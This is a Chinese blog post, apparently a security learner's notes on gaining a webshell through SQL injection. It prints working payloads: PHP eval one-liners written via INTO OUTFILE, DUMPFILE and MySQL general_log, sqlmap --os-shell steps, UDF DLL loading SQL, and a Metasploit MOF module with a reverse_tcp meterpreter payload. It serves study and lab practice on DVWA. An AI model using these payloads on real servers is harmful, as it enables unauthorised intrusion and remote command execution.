<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lato:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.4/css/all.min.css" integrity="sha256-mUZM63G8m73Mcidfrv5E+Y61y7a12O5mW4ezU3bxqW4=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Muse","darkmode":false,"version":"8.8.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>
<meta name="description" content="最近刚刚入职，师傅叫我第一熟悉的就是SQL getshell，常见的两种方法还是都知道的，只是没具体去实现过，这里做个总结。 首先要明确的是sql注入getshell的方式： getshell是指攻击者通过利用SQL注入获取系统权限的方法，Webshell提权分两种：一是利用outfile函数，另外一种是利用**–os-shell**；UDF提权通过堆叠注入实现；MOF提权通过”条件竞争”实现.前">
<meta property="og:type" content="article">
<meta property="og:title" content="SQL getshell">
<meta property="og:url" content="http://example.com/2022/06/22/SQL/SQL%20getshell/index.html">
<meta property="og:site_name" content="Hack the world">
<meta property="og:description" content="最近刚刚入职，师傅叫我第一熟悉的就是SQL getshell，常见的两种方法还是都知道的，只是没具体去实现过，这里做个总结。 首先要明确的是sql注入getshell的方式： getshell是指攻击者通过利用SQL注入获取系统权限的方法，Webshell提权分两种：一是利用outfile函数，另外一种是利用**–os-shell**；UDF提权通过堆叠注入实现；MOF提权通过”条件竞争”实现.前">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-06-22T14:48:54.829Z">
<meta property="article:modified_time" content="2022-07-02T14:51:45.797Z">
<meta property="article:author" content="D0gekong">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://example.com/2022/06/22/SQL/SQL%20getshell/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2022/06/22/SQL/SQL%20getshell/","path":"2022/06/22/SQL/SQL getshell/","title":"SQL getshell"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>SQL getshell | Hack the world</title>
  




  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">Hack the world</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">Fake it till Make it</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home"><a href="/" rel="section"><i class="home fa-fw"></i>首页</a></li>
        <li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="user fa-fw"></i>关于</a></li>
        <li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="tags fa-fw"></i>标签</a></li>
        <li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="th fa-fw"></i>分类</a></li>
        <li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="archive fa-fw"></i>归档</a></li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-overview-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="D0gekong"
      src="/images/pic.jpg">
  <p class="site-author-name" itemprop="name">D0gekong</p>
  <div class="site-description" itemprop="description">散人的漫漫学习路</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">120</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/SantaJiang" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;SantaJiang" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/jiangshengda@foxmail.com" title="E-Mail → jiangshengda@foxmail.com"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.jianshu.com/u/3aa0cb901bee" title="简书 → https:&#x2F;&#x2F;www.jianshu.com&#x2F;u&#x2F;3aa0cb901bee" rel="noopener" target="_blank"><i class="fab fa-jianshu fa-fw"></i>简书</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://blog.csdn.net/jsd581?spm=1010.2135.3001.5421" title="CSDN → https:&#x2F;&#x2F;blog.csdn.net&#x2F;jsd581?spm&#x3D;1010.2135.3001.5421" rel="noopener" target="_blank"><i class="fab fa-csdn fa-fw"></i>CSDN</a>
      </span>
  </div>



        </div>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/06/22/SQL/SQL%20getshell/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/pic.jpg">
      <meta itemprop="name" content="D0gekong">
      <meta itemprop="description" content="散人的漫漫学习路">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hack the world">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SQL getshell
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2022-06-22 22:48:54" itemprop="dateCreated datePublished" datetime="2022-06-22T22:48:54+08:00">2022-06-22</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2022-07-02 22:51:45" itemprop="dateModified" datetime="2022-07-02T22:51:45+08:00">2022-07-02</time>
      </span>

  
    <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span id="busuanzi_value_page_pv"></span>
    </span>
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <p>最近刚刚入职，师傅叫我第一熟悉的就是SQL getshell，常见的两种方法还是都知道的，只是没具体去实现过，这里做个总结。</p>
<p>首先要明确的是sql注入getshell的方式：</p>
<p>getshell是指攻击者通过利用SQL注入获取系统权限的方法，Webshell提权分两种：一是利用<strong>outfile函数</strong>，另外一种是利用**–os-shell**；UDF提权通过堆叠注入实现；MOF提权通过”条件竞争”实现.前文所说的两种方法即是Webshell提权，后两者会有一定的限制，这里阐述原理。</p>
<p>Webshell提权:</p>
<p>1.into outfile</p>
<p>利用条件:</p>
<p>web目录具有写的权限，能够使用单引号</p>
<p>知道网站的绝对路径</p>
<p>my.ini这个配置文件中有一项secure_file_priv没有具体值(注意不是空或者NULL)</p>
<p><code>secure_file_priv</code>：secure_file_priv是用来限制load 、dumpfile、into outfile、load_file()函数在哪个目录下拥有上传和读取文件的权限 ,即就是拿来限制内外读写文件的一个配置</p>
<p>关于secure_file_priv的相关：</p>
<p>当该配置的值为null时，mysqld不允许导入和导出</p>
<p>当该配置的值为/tmp/时，mysqld的导入和导出只能发生在/tmp/目录下(这里/tmp/表示限定目录，即我们自己设定的目录)</p>
<p>当该配置的值为没有具体值时。mysqld的导入和导出没有限制</p>
<p>所以为了我们能够使用into outfile函数写马进去，就需要将该配置设置为没有值，设置的方法如下:</p>
<p> 1）看secure-file-priv参数的值：show global variables like ‘%secure%’;若secure_file_priv 的值默认为NULL，则表示限制mysqld 不允许导入|导出</p>
<p>2）修改secure_file_priv 的值：我们可以在mysql/my.ini中查看是否有secure_file_priv 的参数，如果没有的话我们就添加 secure_file_priv = ‘ ‘ 即可；此时再查看secure_file_priv的值如下已经变为空了，设置完成后我们就可以利用这个函数来写入一句话木马</p>
<p>以上操作建议使用navicat或者其他数据库可视化软件进行操作。</p>
<p>写入Webshell：</p>
<p>以上的secure_file_priv配置设置完成好，再满足我们具有写的权限和知晓绝对路径，就能尝试用sql语句写入一句话木马。这里方便测试，建议使用dvwa</p>
<p>测试注入点以及判断列数这里跳过，都是老生常谈的操作，加上因为是我们自己搭的靶场，所以我们也知晓自己的路径</p>
<p>所以我们可以写入一句话:</p>
<p> 1’ union select 1,”<?php eval($_POST['cmd'])?>“ into outfile ‘E:\xxxxx\phpstudy\dvwa\test.php’ #</p>
<p>这里路径中要使用双斜杠，第一个斜杠是转义的意思，不然无法解析，关于字符串的解析不一定只出现在web服务器里，其他情况下也有可能出现，而且windows采用的是单个斜杠的路径分割形式，导致我们对文件路径进行解析的时候发生不必要的错误，所以多加个斜杠进行转义。</p>
<p>PS：这里我把马传进去的时候，我是用蚁剑连的，意外的发现以GET方式可能会被过滤，POST和REQUEST方式没有被过滤。</p>
<p>2.os-shell原理</p>
<p>os-shell就是sqlmap的一个功能，为存在的注入点提供一个可交互的webshell，大致原理就是将脚本插入数据库中，然后生成相应的文件，获取shell就能执行相关命令。其实原本–os-shell就是使用udf(用户自定义函数)获取webshell，也是通过into outfile向服务器写入两个文件，一个可执行系统命令，一个进行上传文件。</p>
<p>利用条件:</p>
<p>要求为DBA数据库管理员权限(–is-dba phpstudy搭建的一般为DBA)</p>
<p>php的GPC关闭即主动转义的功能关闭，可以使用单双引号</p>
<p>(不使用十六进制即0x编码),知道网站的绝对路径，而且文件不能覆盖写入，所以文件必须为不存在</p>
<p><code>–secure-file-priv</code>没有值（该函数是能否执行-0s-shell的关键）：<code>–secure-file-priv</code>是mysql5.7+的新参数,用于限制LOAD DATA, SELECT …OUTFILE, LOAD_FILE()传到哪个指定目录 </p>
<p>PS:secure_file_priv为只读参数，不能使用set global命令修改，需要在my.ini加入后重启Mysql才可以</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sqlmap在指定的目录生成了两个文件（文件名是随机的，并不是固定的）</span><br><span class="line">以下1.php 2.php就是举例，不是实际文件名</span><br><span class="line">1.php 用来执行系统命令</span><br><span class="line"></span><br><span class="line">2.php 用来上传文件</span><br><span class="line"></span><br><span class="line">secure_file_priv没有具体值（在mysql/my.ini中查看）</span><br><span class="line"></span><br><span class="line">magic_quotes_gpc:（PHP magic_quotes_gpc作用范围是：WEB客户服务端；作用时间：请求开始时）</span><br></pre></td></tr></table></figure>

<p>os-shell的具体实现步骤:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">1.启动sqlmap：sqlmap -r test.txt --os-shell</span><br><span class="line">2.选择语言(ASP，ASPX，JSP，PHP)首次使用默认asp语言</span><br><span class="line">3.输入绝对路径</span><br><span class="line">4.写木马文件</span><br><span class="line">  4.1：pwd //查看当前路径</span><br><span class="line">  4.2：echo &#x27;&lt;?php @eval($_POST[&#x27;a&#x27;]); ?&gt;&#x27;&gt;&gt; 123.php  //将木马写入123.php</span><br><span class="line">  4.3：cat 123.php //打印123.php文件的内容</span><br><span class="line">5.用webshell连接</span><br></pre></td></tr></table></figure>

<p>以上大致就是Webshell的两种方式，但是我们大多数都不知道路径即就是绝对路径，那产生路径问题的原因是？</p>
<p>大多数sql注入的写Shell方式而言,网站的绝对的路径都是需要知道的,这里需要知道的原因不是因为outfile相对路径无法写shell,而是因为不知道路径,webshell无法连接且通过相对路径的方式写出来的shell大概率是无法执行的,或者是权限不够写</p>
<p>所以我们可以采用dnslog注入，就是dns外带查询，通过查询相应的dns解析记录，来获取我们想要的数据</p>
<p>PS：在实际场景中，盲注情况比较多，而联合查询的结果只会为了提供真与假，无法给予详细获取，通过手工测试需要花费大量时间，而使用sqlmap直接去跑数据也有可能触发waf或者被网站封ip，影响测试进度，所以dnslog注入就应运而生</p>
<p>这里我们要使用一个load_File()函数，该函数会读取一个文件并将其内容作为字符串返回</p>
<p>语法:load_file(filename)，其参数为文件的完整绝对路径</p>
<p>其满足条件为：</p>
<p>1.文件处于服务器上</p>
<p>2.具有该文件的读权限，该属性和secure_file_priv状态相关</p>
<p>3.文件必须所有人都可见，且字节大小小于最大限度</p>
<p>除了上述的Webshell，还有udf以及mof，以及通过日志写入</p>
<p>这里要引入一种不常见的注入方式，堆叠注入，如果对buu里的web有过练习，应该是有印象的</p>
<p>堆叠注入写shell(日志注入)</p>
<ul>
<li>主要是利用到了Mysql的日志来进行写shell,payload如下:<code>set global general_log = &quot;ON&quot;;set global general_log_file=&#39;C:/xxx/www/muma.php&#39;;select &#39;&lt;?php eval($_POST[cmd]);?&gt;&#39;;</code></li>
<li>然后用webshell管理工具连接，就可以进行攻击</li>
</ul>
<p>如果说联合查询就能够写入shell，那当然是最好不过了</p>
<p><code>union select 1,&#39;&lt;?php eval($_POST[1]);?&gt;&#39; INTO OUTFILE &#39;/var/www/html/test.php&#39; #</code></p>
<p><code>union select 1,&#39;&lt;?php eval($_POST[1]);?&gt;&#39; INTO dumpfile &#39;/var/www/html/test.php&#39;#</code> </p>
<p>这里对于outfile和dumpfile有一点小区分:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">outfile后面不能接0x开头或者char转换以后的路径，只能是单引号路径,但是值的部分可hex</span><br><span class="line"></span><br><span class="line">在使用outfile时,文件中一行的末尾会自动换行,且可以导出全部数据,同时如果文本中存在\n等字符,会自动转义成\n,也就是会多加一个\</span><br><span class="line"></span><br><span class="line">outfile函数可以导出多行，而dumpfile只能导出一行数据；</span><br><span class="line"></span><br><span class="line">outfile函数在将数据写到文件里时有特殊的格式转换，而dumpfile则保持原数据格式</span><br><span class="line"></span><br><span class="line">使用dumpfile时,一行的末尾不会换行且只能导出部分数据（这里比较数据比较少,没有体现出来）；但dumpfile不会自动对文件内容进行转义,而是原意写入（这就是为什么我们平时UDF提权时使用dumpfile来写入的原因）</span><br></pre></td></tr></table></figure>

<p>udf提权:</p>
<p>udf(user defined function)即用户自定义函数，是我们对数据库功能的一种自定义扩展，经过这个可以实现在mysql无法实现的功能</p>
<p>条件：</p>
<p>1.sqlmap的udf动态链接库文件：sqlmap根目录/data/udf/mysql</p>
<p>2.一般来说动态链接库为了防止被误杀都会进行编码处理，不能直接使用，所以我们可以用sqlmap自带的解码工具cloak.py来解码使用，cloak.py 的位置为：sqlmap根目录/extra/cloak/cloak.py</p>
<p>以下为举例payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">create table udfeval(shellcode longblob);    //创建表</span><br><span class="line"></span><br><span class="line">insert into udfeval values(load_file(&#x27;F:/udf.dll&#x27;));  //在表里插入信息</span><br><span class="line"></span><br><span class="line">select shellcode from udfeval into dumpfile &#x27;C:\\windows\udf.dll&#x27;;  //将表里面的信息导出</span><br></pre></td></tr></table></figure>

<p>以上方法都需要知道secure_file_priv的值，那我们可以通过–sql-shell来知道输入sql语句select@@secure_file_priv提示为NULL，所以就会出现无法继续的错误</p>
<p>mof提权</p>
<p>M0F提权原理<strong>：</strong>它就是利用了c:/windows/system32/wbem/mof/目录下的nullevt.mof文件，每分钟都会在一个特定的时间去执行一次的特性，来写入我们的cmd命令使其被带入执行</p>
<p>条件:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Win sever 03以后无法使用</span><br><span class="line"></span><br><span class="line">Mysql启动身份具有权限去读写c:/windows/system32/wbem/mof目录</span><br><span class="line"></span><br><span class="line">secure-file-priv参数不为null</span><br></pre></td></tr></table></figure>
<p>因为mof文件每五秒就会执行一次，而且是系统权限，我们可以通过load_file将文件写入/wbem/mof里，然后系统每隔五秒就会执行我们上传的mof。我们可以通过mof里自己编写的脚本，来让系统执行命令，进行提权<br>以下为我参考的相关资料:（vbs脚本）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">MSF脚本自动化</span><br><span class="line">use exploit/windows/mysql/mysql_mof</span><br><span class="line"></span><br><span class="line"># 设置payload</span><br><span class="line">set payload windows/meterpreter/reverse_tcp</span><br><span class="line"></span><br><span class="line"># 设置目标 MySQL 的基础信息</span><br><span class="line">set rhosts 192.168.127.132</span><br><span class="line">set username root</span><br><span class="line">set password root</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p>缺点：攻击的选择范围较小，而且清理痕迹可能会比较麻烦</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/05/12/buu/Buu%E5%81%9A%E9%A2%98%E6%97%A5%E5%BF%97web6/" rel="prev" title="Buu做题日志web6">
                  <i class="fa fa-chevron-left"></i> Buu做题日志web6
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/06/22/trick/JWT%EF%BC%88json%20web%20token)%E6%A6%82%E5%BF%B5/" rel="next" title="JWT">
                  JWT <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">D0gekong</span>
</div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="https://cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script>

  





  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
